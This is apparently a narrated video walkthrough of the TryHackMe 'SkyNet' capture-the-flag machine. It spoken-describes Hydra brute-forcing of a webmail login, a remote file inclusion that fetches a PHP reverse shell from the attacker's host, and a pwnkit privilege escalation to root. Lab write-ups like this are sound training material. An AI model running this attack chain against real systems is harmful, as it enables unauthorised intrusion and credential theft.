Hey, this is a walkthrough of the SkyNet TryHackMe CTF. It's a vulnerable Terminator themed Linux machine. So we're going to start our machine as usual. Wait for an IP. We've got our VPN connected already. I've pinged the VPN. I know it's all good to go. So we've got to find out what Miles' password is for his emails. Find a hidden directory. Answer all these questions. What's user flag and root flag? We'll work out what vulnerability is called when you include a remote file for malicious purposes. Okay, so SkyNet. 10 more seconds and we'll start. Okay, so we've got our IP 10.10.148.114. Copy that, and we're going to do an nmap scan to start with. We'll go IP in there. We'll scan, see what open ports we've got, what services are running. We're scanning for all ports with the -P-A just gives you all the services and versions of them and the operating system and any scripts. And these other two tags just make the scan run a bit faster. So see what we got. While waiting for that, we can see if we've got a website on the IP address. So we can put the IP in there, and we can see we've got SkyNet, a SkyNet search box, and we can have a look at the source page. See if there's anything on there we can use. Anything vulnerable? No, doesn't look like it. So we're just waiting for a scan to finish. It's almost done. Okay. So we've got port 22s open, SSH 7.2p2, port 80, Apache 2.48, HTTP. We've got 110 open, which is POP3, that's a mail server. It's running Dovecot POP3D. We've got Samba shares 139, 143. Oh, sorry, 139, 445. Samba shares. We've got 143 open, IMAP, which is another mail thing. Okay, so what we'll do next is we've got port 80 there, so we'll do a gobuster scan. And that's going to be a directory one. We're going to do HTTP. We're going to do -u HTTP, and we'll put our IP in there, and we're going to do a word list, USR share. So we're going to search for the directories in this word list /gobuster, and we can press tab and we can see all the available word lists by pressing tab. So we'll just do a directory list medium.txt, copy that and paste that in there. and we'll do search for HTML files, text, with a comma, text files, and PHP files, and we'll do 50 threads and see what we can find. And we see we've got an admin page. We've got CSS, .php. So we'll just let that run for a minute and we'll start having a look at some of the other ports. So we've got 139 and 445, so we can do some enumeration on the Samba shares. So we can use SMB client with a capital L, and we can put our IP in there. No, that's not our IP. 10.10. What's the IP again? 148.114. We can have a look here. We don't need a password. And we can see we've got anonymous, Miles Dyson's personal share, SkyNet anonymous share, print, and IPC. So if we have a look at SMB client, do I spell it right? SMB, come on, SMB. And we'll put our IP in there. 10.10, 148, and we'll have a look at try Miles Dyson first, see if we can find anything in there. Access denied, so we need a password for that one. Let's clear the screen. Let's try anonymous. And we can see we've got access to anonymous. So if we do ls to view the files, we've got attention.txt and we've got logs. So let's get attention.txt so we can download it to our machine by using get. And we can go to change directories to logs. Have a look in there. And we can see we've got log1, log2 and log3.txt. So we get all those. Log1.txt. And we'll get log2 and log3.txt. Okay, so that's about all that's in that share, I think. ls. That's it. So we can exit that. We can clear the screen. Now we've got them in our download to our machine. Got log1, log3.txt, and we've got attention. So we'll have a look at attention. What does the attention say first? It says a recent system malfunction has caused various passwords to be changed. All SkyNet employees are required to change their password after seeing this. Miles Dyson. Okay, that doesn't help us much. Let's have a look at log1.txt. Okay, so we've got some kind of list here. Looks like maybe a password list. I'd say it's a password list. we can use to crack a password. We don't know what the password is. We can have a look at log2.txt. There's nothing in that one. Log3. Nothing on that, so it's just that log1. Alright, so we've got a password list on log1.txt. So we can get rid of log2 because there's nothing on that. We can get rid of log3. And we can get rid of attention. We don't need any of those. Clear the screen. Alright. So we go back to our gobuster scan. And it's still going. We've got admin, config, AI, so we can have a look at some of those directories. So have a look at admin, see if there's anything in there. Forbidden. Okay, so we can't look at that. What other ones do we have? Config. No, there's no access to that. AI. No. Nothing there. JS. No. We've got no access to any of them. Okay, so I'll just wait till this scan finishes because it's got a long way to go yet. And I'll come back when the scan's finished. Okay, I'm back. We found also squirrel mail. So let's have a look at that one. Squirrel mail. And we can see we've got a login page for a webmail for nuts. Squirrel mail. We don't know the name and the password. But what's the question say? What is Miles' password for his email? So we've got to find that password. So we're going to use a tool called Hydra. So we'll do Hydra. This is a password cracking tool, and we know the user is Miles Dyson. And we also want to use our list that we found, which is log1.txt in there. We want to put our IP in there, 10.10, what was it, 148.114. And we're going to, so to get more information, we're going to need to, we'll just put, say, test in there, and test in there, and we're going to run burp. So we'll turn on our proxy, which is an add-on for Firefox. You set up on port 8080 to intercept the request. So now we'll just start burp suite. Wait till that starts. Okay, so hit next, start burp. And we're going to capture our request on burp suite. Starting project. Okay, now so we're going to put it on proxy. We're going to turn intercept on so we can intercept our request. So now when you go to, we've got our Foxy proxy on, so it's going to intercept it on port 8080. So if we say login now, we've intercepted our request here. So we can see it's a post request, and it's going to squirrel mail search redirect PHP. And we've got login, username test, secret key test. Okay, so to crack the password we need to use some of this information here. So what we do is go back to our Hydra, and we know it's a post, so we do http dash, it's a post form, and we're going to put in all our info now in here from Burp Suite. So we're going to squirrel mail redirect.php, we're going to copy that and we're going to paste it in here, and we're going to put a colon in between each section. So we've got that's the address it's going to, redirect.php on the website. Now we're going to put in this information down here, copy that, and we'll paste that in there. Okay, and we've got to change this instead of test. You need to change it to put an arrow going up, user, another arrow there, and for secret key, which is our password, we want to make this one pass. So an arrow going up, pass. So we've got user and pass in there, and just got to put one more bit of information in here. We'll turn off the proxy now. We'll log in, and we can see we've got error, username or password incorrect. So let's put incorrect in there. This is what happens when it's a failed login, so it knows what to expect. Incorrect, and we'll put another quote in there, and we'll run this and hopefully get a password. Yep, that was quick. Okay, so we can see we've got Miles Dyson's the login, password, Cyborg 007 Halo Terminator. It's a cool password, so copy that password. And we're going to log into our mail now. So Miles Dyson. And we'll put our password in here. And we're logged in. Okay. So we can see we've got SkyNet at SkyNet. Have a look at this email. Okay, we have changed your SMB password after system malfunction. Okay, so we need this password here for SMB for Miles Dyson. So we'll copy that and go back and have a look. And it's a good idea to put, as you're doing this, to keep notes. So good way of doing it would be just to get a use nano, and we'll call it notes.text, and so we've got our user Miles Dyson, and the password was this. Copy that and we'll put that in there. And we also found another password, SMB password, and we can put that in there, and we'll say this is his email password. So go back to the email again, and we'll find that password, so we'll copy that and we'll put that in there too. Okay, so we've got his email password and his SMB password, and we can Control X to save, say yes. Now we've got it saved in our machine. So let's have another look at this email, so there's anything else that we can use in here. We'll have a look at this one. It's just a lot of binary. And this one, everything else, balls have 0 to me. None of that's any use. Alright, so next step is to have a look at Miles Dyson's, so we do SMB client. We're going to have a look at his SMB now because we've got his password, and we'll do -u, which is the user for Miles Dyson, and we're going to do the IP address of the target, 10.10 184 148 114, and we're doing Miles Dyson, the share we found earlier we couldn't access, and now we put our password in there. So I think it's saved already on the machine, so just copy it in there, and we're in. So we use the if you do ls, you can see our notes.txt. You do cat notes.txt. We use that password there, SMB password, put in there to get into the. Doesn't look like it's found anything else there. Okay, so now if we do ls in here, we can have a look, and we can see we've got improving deep neural networks, natural language, PDF. There's a notes file there, so we'll have a look at notes. So we do cd notes and ls on that, and let's have a look what we got. Search important.txt, and so that might be interesting. So, okay, so we'll do get important.txt. Okay, so we've got that file now, so we'll exit this, and we'll cat that, see if we can read that file. And we can see add features to the beta CMS, so we've got another directory there. Work on the T800 model, 101 blueprints, spend more time with my wife. Okay, so we'll copy that. We're going to need to use that. So that's a directory found, so we can so we don't need the webmail anymore. We've found all the information in that, so we'll put our directory in here we just found, and we see we've got Miles Dyson's personal page. Picture of Miles Dyson, neural net processor, original inventor of it, the SkyNet. Okay, so now we've got this new directory. We'll search that with gobuster to find it, see if there's any other directories off that one. So just stop this scan now, we don't need that one anymore. We'll clear the screen. So now we'll put our directory in here, the one we just found. Paste that in there and run this. See what we can find. Well, while that's running, we can have a look at the questions again. Okay, what is Miles' password for his emails? We'll save that in that file, which was this one, Cyborg 007 Halo Terminator. So we'll copy that in there, paste, and correct. What is the hidden directory? That's the one we're searching right now. So that is running now. This directory here we just found, which is also in that there. It's in that important.txt. So that's the one we want, the hidden directory. Copy that, and we'll paste that in there. And correct. Okay, what is the vulnerability called when you include a remote file for malicious purposes? Alright, so we've got to explore that. So see if this is still running. It is. It's only done 1.6%. So I'll stop the video again and I'll pause the video and I'll be back in a minute once this scan finishes. Okay, I'm back. So we've found this administrator. So let's copy that and search it on here. So put administrator in there and see what we can find. Kappa CMS. Okay, so we found another login page. User valid username and password to gain access to the administrator. So we don't know the username and password, but we know it's Kappa CMS. So we can use another tool called searchsploit. So we'll clear the screen there and we'll do searchsploit and we'll search for Kappa CMS, and we can see alert config.php, local remote file, and it's in PHP web apps. So we can get that file downloaded to a machine by going and just do -m and do php /web apps /25971.txt, and see it's been copied to our folder now. Okay, so we'll do ls and we can see we've got 25917.971.txt. So we'll clear the screen. So we'll do cat 971.txt, and we can see, what can we see? Attacker might include local or remote files to read a non-PHP file's vulnerability. PHP code injection. So it's file inclusion. So our question says, what is the vulnerability called when you include a remote? So I'd say it's remote file inclusion. And correct. Okay, so what is the user flag? So now we're going to get into the machine to get these flags. So what we're going to do is we're going to use, it says you can use this information here to get a shell on the machine. So what we'll do is we'll copy this here up to there, and we're going to use another tool called curl, which will just like going to using the web browser basically. So we'll use curl, and we'll do http, and it's 10.10. We basically need all this information here, so we'll just copy that as well. Just copy that into there. Okay, administrator, and then after the administrator you need the this part here. We'll copy that, paste that in there. Alright, now it says you've got to do HTTP, so that's going to be my VPN IP, this one here, and a reverse shell. So we need to get a reverse shell, which I'll have one here already. So we'll rename this, just make it shell.php. Okay, and just have a quick look and make sure we've got our IP in there. So it's 10.8.98.254, which is that IP there, VPN, and we're going to use port 1234. Alright, so we shouldn't need that anymore, I don't think, but we can stop this one. Okay, so now we're going to look at our reverse shells on the desktop. So have a look, we've got desktop there, so if we change directory to desktop, you can see we've got our shell.php there. So we're going to start a Python server to get it to our target, the reverse shell. The Python 3-m http.server. Okay, so it says it's running on port 8000, and we also need to start a listener. We'll just get a new tab, and it was on port 1234. 1234. So we're listening on that port to get our connection back to our machine. Okay, so now we've got to put in HTTP, and we're going to put our VPN. It's on port 8000, and it's shell.php. So hopefully this will work. So we've got our VPN in there, port 8000, because that's listening on 1234, ready to go. This is on port 8000, that's where the reverse shell is. So if we just hit enter now, and now if we check our listener, and we see we've got a reverse shell. So we're connected to the target. If we do ID, you can see we're www-data user. Alright. So to make the shell more stable, we'll do a Python 3-C. We'll import pty.spawn bin bash. Okay, now we're more stable, and we'll export term so we can clear the screen. Alright, so got to find the user flag. So user flags are normally in the home directory. So if we just do pwd, see what directory we're in. We're in the root directory. So we'll change to home, do ls, and Miles Dyson. So we'll change the directory to Miles Dyson, and we'll do ls there, and we can see we've got user.text. So we'll do cat user.text, and we found our first flag. User.text, so copy that one, and we're going to paste it back in here, and correct. Okay, what is the root flag? So a good way to find ways to get privilege escalation, I would say, is to, we don't know the password, so there's no point. If we do sudo.u.l, we don't know his www password, www-data's password, so we can't do that. So we'll clear the screen. We're going to run linps, which is a really good tool to check for vulnerabilities, check the whole system for ways we can escalate our privileges. Okay, so we'll just clear that, we don't need that anymore. And I've got mine saved in privilege escalation directory. Do ls. You can see we've got linps.sh, but if you haven't got it, you can just go to type in linps in the search box and GitHub, and this one here, click on that one, and we just go to if you go down here, you go to releases, so you click on releases, waiting for GitHub, waiting, come on, GitHub. Okay, so you download this, just click on that linps.sh and that'll download it to your machine. Alright, so I've already got it, linps.sh, so we're going to start another Python server to get it get it to our target machine. So we'll do http sorry, HTTP server. Oops, it's already in use. Oh, so I'm already using over here, that's right. So I just have to close this one. I'll try that again. And we can see we've port 8000 and we're going to get our linpeas.sh to the target. So go back to our target and we've got to change to the temp directory because that's where you can upload files to. You can't do it to any other directory usually. So if we use wget http and we're going to use our VPN IP 10.8.98.254. It's port 8000 and it's linpeas.sh and that gets downloaded to the machine. Okay, so that should be in there now. If you do ls, you should see it, linpeas.sh. Right, now we've got to change permissions to make it executable. So we do chmod checks linpeas.sh, and to run it do ./linpeas.sh, and we'll run that and see what we can find. So we're looking for red and yellow. Just let that run. It goes through the whole machine, finds any weaknesses, vulnerabilities, anything that we can use to escalate privileges, find passwords, whatever you can do to get to root. It's still running. Goes for everything. Okay, it's done. So we'll go back up the top and we'll have a look for anything that's in red or yellow. So we can see we've got basic information, we've got our Linux version, the kernel, in bash, sudo version 1.816, environment, and we can see vulnerabilities that might be able to use to get privilege escalation. We've got dirty cow, says probable. Dirty cow 2, pawn kit's really easy to use. Says you can probable for pawn kit. So pawn kit's a good one, I've used it before. As you can see, if I go back to this folder here, stop that for a minute, have a look. I've got pawn kit there already downloaded, but if you want to get pawn kit, you just go to GitHub again and search for pawn kit, and search for that. And it's this one here, the first one, so click on that one there. It's in GitHub. And just get the download the zip or get the code there and download it using git clone. Command git clone and then that. And then go to the directory of pawn kit. So it's already there. So we'll start our server again to download to the machine. Go back to our target. Clear the screen. We're already in the temp directory. So we'll do wget again, do it the same way we got the link Ps. HTTP 10.8.98.254, and it's on 8000 again. This time it's pawn kit, and it's done. So we change permissions, chmod +X pawn kit, and we'll run it with the same command as last time, and root. We say who am I, we're root. Alright, that's it, we have full privileges on the machine now. So all we matter to do is find the root flag, which is usually in the root directory. So if we do cd back to there, have a look, you can see we've got root there. So if we do cd root ls root.txt, so we do cat root.txt, and there's our final flag. Copy that, and we'll just paste it back in here. Submit. Correct. Congratulations, done the room. Okay. That's about it for that one. Alright, see you next time.